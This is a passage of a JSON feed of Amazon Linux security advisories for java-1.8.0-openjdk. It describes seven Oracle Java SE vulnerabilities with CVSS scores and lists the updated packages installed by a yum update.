__](<https://access.redhat.com/security/cve/CVE-2020-14782>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). ([CVE-2020-14792 __](<https://access.redhat.com/security/cve/CVE-2020-14792>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). ([CVE-2020-14796 __](<https://access.redhat.com/security/cve/CVE-2020-14796>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14797 __](<https://access.redhat.com/security/cve/CVE-2020-14797>))\n\nVulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14803 __](<https://access.redhat.com/security/cve/CVE-2020-14803>))\n\n \n**Affected Packages:** \n\n\njava-1.8.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.8.0-openjdk_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.i686 \n \n noarch: \n java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.56.amzn1.noarch \n java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.56.amzn1.noarch \n \n src: \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.src \n \n x86_64: \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.x86_64 \n \n \n", "edition": 1, "modified": "2021-01-12T22:51:00", "published": "2021-01-12T22:51:00", "id": "ALAS-2021-1460", "href": "https://alas.aws.amazon.com/ALAS-2021-1460.html", "title": "Medium: java-1.8.0-openjdk", "type": "amazon", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2021-01-08T01:43:44", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "description": "**Issue Overview:**\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). ([CVE-2020-14779 __](<https://access.redhat.com/security/cve/CVE-2020-14779>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14781 __](<https://access.redhat.com/security/cve/CVE-2020-14781>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14782 __](<https://access.redhat.com/security/cve/CVE-2020-14782>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). ([CVE-2020-14792 __](<https://access.redhat.com/security/cve/CVE-2020-14792>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). ([CVE-2020-14796 __](<https://access.redhat.com/security/cve/CVE-2020-14796>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14797 __](<https://access.redhat.com/security/cve/CVE-2020-14797>))\n\nVulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14803 __](<https://access.redhat.com/security/cve/CVE-2020-14803>))\n\n \n**Affected Packages:** \n\n\njava-1.8.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.8.0-openjdk_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n aarch64: \n java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1.aarch64 \n \n i686: \n java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1.i686 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1.i686 \n \n noarch: \n java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.amzn2.0.1.noarch \n java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.amzn2.0.1.noarch \n java-1.8.0-openjdk-javadoc-debug-1.8.0.272.b10-1.amzn2.0.1.noarch \n java-1.8.0-openjdk-javadoc-zip-debug-1.8.0.272.b10-1.amzn2.0.1.noarch \n \n src: \n java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1.src \n \n x86_64: \n java-1.8.0-openjdk-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-headless-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-devel-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-demo-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-src-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-accessibility-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-accessibility-debug-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.amzn2.0.1.x86_64 \n \n \n", "edition": 1, "modified": "2021-01-05T23:34:00", "published": "2021-01-05T23:34:00", "id": "ALAS2-2021-1579", "href": "https://alas.aws.amazon.com/AL2/ALAS-2021-1579.html", "title": "Medium: java-1.8.0-openjdk", "type": "amazon", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2020-12-19T03:31:48", "bulletinFamily": "unix", "cvelist": ["CVE-2020-14803", "CVE-2020-14782", "CVE-2020-14792", "CVE-2020-14781", "CVE-2020-14779", "CVE-2020-14797", "CVE-2020-14796"], "description": "**Issue Overview:**\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). ([CVE-2020-14779 __](<https://access.redhat.com/security/cve/CVE-2020-14779>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: JNDI). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14781 __](<https://access.redhat.com/security/cve/CVE-2020-14781>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14782 __](<https://access.redhat.com/security/cve/CVE-2020-14782>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Hotspot). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data as well as unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 4.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:N). ([CVE-2020-14792 __](<https://access.redhat.com/security/cve/CVE-2020-14792>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE, Java SE Embedded accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 3.1 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:N). ([CVE-2020-14796 __](<https://access.redhat.com/security/cve/CVE-2020-14796>))\n\nVulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 7u271, 8u261, 11.0.8 and 15; Java SE Embedded: 8u261. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of Java SE, Java SE Embedded accessible data. Note: Applies to client and server deployment of Java. This vulnerability can be exploited through sandboxed Java Web Start applications and sandboxed Java applets. It can also be exploited by supplying data to APIs in the specified Component without using sandboxed Java Web Start applications or sandboxed Java applets, such as through a web service. CVSS 3.1 Base Score 3.7 (Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N). ([CVE-2020-14797 __](<https://access.redhat.com/security/cve/CVE-2020-14797>))\n\nVulnerability in the Java SE product of Oracle Java SE (component: Libraries). Supported versions that are affected are Java SE: 11.0.8 and 15. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Java SE accessible data. Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets, that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability does not apply to Java deployments, typically in servers, that load and run only trusted code (e.g., code installed by an administrator). CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N). ([CVE-2020-14803 __](<https://access.redhat.com/security/cve/CVE-2020-14803>))\n\n \n**Affected Packages:** \n\n\njava-1.8.0-openjdk\n\n \n**Issue Correction:** \nRun _yum update java-1.8.0-openjdk_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.i686 \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.i686 \n \n noarch: \n java-1.8.0-openjdk-javadoc-1.8.0.272.b10-1.56.amzn1.noarch \n java-1.8.0-openjdk-javadoc-zip-1.8.0.272.b10-1.56.amzn1.noarch \n \n src: \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.src \n \n x86_64: \n java-1.8.0-openjdk-devel-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-demo-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-src-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-debuginfo-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-headless-1.8.0.272.b10-1.56.amzn1.x86_64 \n java-1.8.0-openjdk-1.8.0.272.b10-1.56.amzn1.x86_64 \n \n \n", "edition": 1, "modified": "2020-12-16T20:31:00", "published": "2020-12-16T20:31:00", "id": "ALAS-2020-1461", "href": "https://alas.aws.amazon.com/ALAS-2020-1461.html", "title": "Medium: java-1.8.0-openjdk", "type": "amazon", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}}]}